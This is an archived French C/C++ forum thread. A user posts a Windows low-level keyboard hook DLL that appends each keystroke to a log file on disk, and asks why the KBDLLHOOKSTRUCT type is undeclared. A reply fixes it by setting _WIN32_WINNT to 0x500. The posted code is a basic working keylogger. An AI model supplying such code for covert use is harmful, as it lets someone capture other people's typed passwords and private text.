begin process at 2012 05 29 21:47:26
  Trouver un code source :

dans

Accueil > Forum > 

Archive C/C++

> 

Archives

> 

Au secours

> 

Problème de reconnaissance d'un type

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Problème de reconnaissance d'un type

lundi 27 mars 2006 à 18:33:06 | Problème de reconnaissance d'un type

max12

Administrateur CodeS-SourceS
#include "main.h"
#define _WIN32_WINNT 0x0400
#include <windows.h>
// Fonction de gestion du hook

__declspec(dllexport) LRESULT CALLBACK HookProc ( int nCode,  WPARAM wParam,  LPARAM lParam)
{
    if  ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
    {
        // Structure de récupération d'infos sur la touche tapée
        KBDLLHOOKSTRUCT hookstruct = *((KBDLLHOOKSTRUCT*)lParam);

// Obtenir la lettre de la touche tapée
        char lettre=(char)hookstruct.vkCode;

// Compteur des octets écrits pour WriteFile()
        DWORD Ecrits;

// Ouverture du fichier log. Le créer s'il n'existe pas.
        HANDLE    hFichier = CreateFile("Z:\\FichierLog.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

// Si le handle retourné est valide alors
        if( hFichier != INVALID_HANDLE_VALUE)
        {
         // Mettre le pointeur du fichier à la fin
         SetFilePointer(hFichier,NULL,NULL,FILE_END);

// Ecrire la lettre dans le fihier log
         WriteFile(hFichier,&lettre,1,&Ecrits,NULL);

// Fermer le fichier
         CloseHandle(hFichier);
        }
    }
   // Renvoi des messages au sytème pour permettre d'autres hooks
   return CallNextHookEx(hHook, nCode, wParam, lParam);

}

Bonjours,

Je tente de faire fonctionner ce code, c'est un copier coller quasi intégrale d'une autre source (http://www.cppfrance.com/code.aspx?ID=27169), d'après MSDN aucune librairie n'est nécéssaire non plus.

z:\test\test.cpp(12): error C2065: 'KBDLLHOOKSTRUCT' : identificateur non déclaré

Qu'est-ce qui pourrait expliquer ceci ? J'ai eu aussi ce problème avec un simulateur de touche signé BN (qui fonctionnait inpécablement lors de la compil de l'original comme toujours).

Comme d'habitude c'est sûrement un truc ridicule, mais c'est de le trouver

A+

[ Lien ]
MSN : x_men_40(
mardi 28 mars 2006 à 00:03:34 | Re : Problème de reconnaissance d'un type

BruNews

Réponse acceptée !
#define _WIN32_WINNT 0x500

tout en haut et devrait passer.

ciao...
[ Lien ]
BruNews, MVP VC++
mardi 28 mars 2006 à 01:42:50 | Re : Problème de reconnaissance d'un type

max12

Merci BN

[ Lien ]
MSN : x_men_40(

Cette discussion est classée dans : problème, wparam, lettre, hfichier, lparam

Répondre à ce message

Sujets en rapport avec ce message

Problème sous-classement [ par Albanderuaz ] Bonjour !J'ai un petit problème avec ce code qui est censé, grâce à un sous-classement, modifier le texte de tous les boutons grâce à un hook global. Hook clavier et fenêtre premier plan [ par krokro6 ] Salut à tous, j'ai un petit problème avec ce code la : #include #include #include #include using namespace std;#define DLLEXPORT  __declsp Windows Message OnNotifyIcon [ par unionx ] bonjourje veux savoir ou je vais trouver la fonction ::OnNotifyIcon(WPARAM wParam, LPARAM lParam) j'ai bien chercher dans la partie ClassWizard et eve vs2005 kbdhook [ par Sebopop2 ] bonjour,j'ai cree une app avec une dll pour faire un hook global clavier, malheureusement celui ci ne fonctionne pas.#include"toolbox.h"</f Je trouve pas le bon code [ par vah bi ] Bonjour à tous , voilà je débute en c et comme editeur j'ai le visual c++.Je  fais actuellement une application avec l'api de visual c++  mais en lang pb avec iwebbrowser2 C++ API Win 32 [ par spyto ] Bonjour,Je tourne en rond, je ne vois pas où ça buggue !!!Voilà, j'ai développé un truc en Win32 pur (j'utilise MSVS.NET C++ 2003)J'ai emprunté une so Comment faire pour re_afficher un dialogue apres "RedrawWindow" API sous DEV cpp [ par LouisJean ] louisjean dev cpp Bonjours a tous!Comment faire pour remontrer le dialogue "Mon_DIALOG" en API wind32 sous DEV Hook WH_MOUSE_LL [ par vecchio56 ] Bonjour,J'utilise un hook bas niveau de type WH_MOUSE_LL, et j'ai un problème lorque je cherche a fermer ma fenêtre principale (la souris se bloque). lparam wparam [ par sokotanic ] salut a quoi cert wpara et lparam , s'il vous plait je veux l'explication de quelqu'un qui avais d'experience pas de msdn ou d'une autre documentati

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

A découvrir

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,468 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales